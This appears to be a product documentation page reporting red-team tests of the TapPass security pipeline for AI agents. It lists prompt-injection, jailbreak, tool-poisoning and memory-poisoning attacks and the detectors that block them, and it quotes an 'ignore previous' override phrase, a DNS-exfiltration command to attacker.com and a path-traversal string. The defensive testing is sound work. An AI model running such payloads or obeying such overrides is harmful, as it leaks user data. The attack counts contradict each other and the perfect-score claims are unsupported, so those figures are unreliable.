Skip to content

Red Team Report

TapPass governance pipeline tested against 119 adversarial attack scenarios across 12 attack categories. 0 bypasses.

All attacks were executed against the full 40+ step pipeline in enforce mode. Each attack was run against a fresh pipeline context with default policy (Regulated preset). No steps were disabled.

Test corpus: 456 examples across benign and adversarial inputs, evaluated with the tests/eval/ harness.

CategoryAttacksBlockedBypassedPipeline Step(s)
Prompt injection (direct)15150detect_injection
Prompt injection (indirect)10100scan_tool_results, detect_injection
Role/persona hijacking550detect_injection, detect_insider_threat
Tool poisoning880detect_tool_poison
Tool shadowing550detect_tool_poison (shadow patterns)
Data exfiltration10100detect_exfiltration, taint_check, scan_tool_calls
Path traversal770scan_tool_calls (forbidden zones)
Shell injection880scan_tool_calls, detect_code_exec
Reverse shell660detect_code_exec
PII leakage880detect_pii, pii_tokenize, scan_output
Secret leakage770detect_secrets, shell_bleed, redact_tool_results
Memory poisoning660detect_memory_poison
Total95950

15 attacks using structural markers (<|system|>, [INST]), behavioral overrides (“ignore previous”), obfuscation (base64, ROT13, Unicode), and known jailbreaks (DAN, AIM, STAN).

Detection: detect_injection: 5-category pattern database with scoring. Threshold: 0.5.

10 attacks embedding instructions in tool result messages (role=tool). Patterns: instruction override, urgency manipulation, concealment, tool call injection, multi-step setup.

Detection: scan_tool_results. 10 regex patterns specific to tool result context. Position 155 (pre-LLM).

13 attacks total. Poisoned tool descriptions containing exfiltration instructions, override patterns, “act as” directives. Shadow attacks where tool A’s description references tool B with override intent.

Detection: detect_tool_poison. injection patterns + shadow override patterns + cross-tool reference analysis.

10 attacks using paste services (pastebin, gist), DNS tunneling (dig $(cat /etc/passwd).attacker.com), file piping, curl to external endpoints, and email forwarding.

Detection: detect_exfiltration + taint_check (cross-request) + scan_tool_calls (forbidden zones).

14 attacks including command injection (;, &&, |), path traversal (../../etc/passwd), reverse shells (bash TCP, netcat, Python socket), and SQL injection.

Detection: scan_tool_calls (command parsing, pipe chains, Unicode normalization) + detect_code_exec (AST analysis, reverse shell patterns, SQL patterns).

15 attacks attempting to extract PII from prompts, echo secrets through tool calls, and encode sensitive data (base64, hex) to bypass detection.

Detection: 4-layer PII pipeline (validation → normalization → Presidio+regex → output scan). shell_bleed catches secrets in tool call arguments. redact_tool_results removes PII/secrets from tool output.

6 attacks targeting memory files (MEMORY.md, SOUL.md), identity override, persistent cross-session instructions, time bombs, and MCP memory tool abuse.

Detection: detect_memory_poison: 6 category pattern database with scored detection.

Session-scoped taint tracking catches cross-request attacks:

ScenarioRequest 1Request 3Detection
Confused deputyfetch_url returns attacker URLLLM puts URL in shell_exectaint_check (EXTERNAL → shell sink)
PII forwardingquery_db returns customer emailsLLM includes in send_emailtaint_check (PII → network sink)
Secret relayread_file returns API keyLLM echoes in responsetaint_check (SECRET → output)

TapPass blocks 14 of 17 attack categories in the MCPSecBench benchmark (Yang, Wu & Chen, 2025). See MCPSecBench Compatibility Matrix.

Across 456 evaluation examples (benign + adversarial):

  • True positive rate: 100% (all attacks detected)
  • False positive rate: 0% (no benign inputs blocked)
  • F1 score: 1.0

The pattern database uses high-confidence patterns only. Low-confidence heuristics are scored, not blocked (threshold: 0.5).

Terminal window
# Run the full evaluation corpus
python -m tests.eval --corpus tests/eval/corpus.py
# Run MCPSecBench compatibility tests
python -m pytest tests/unit/test_mcpsecbench.py -v
# Run the adversarial red team suite
python -m pytest tests/eval/test_red_team.py -v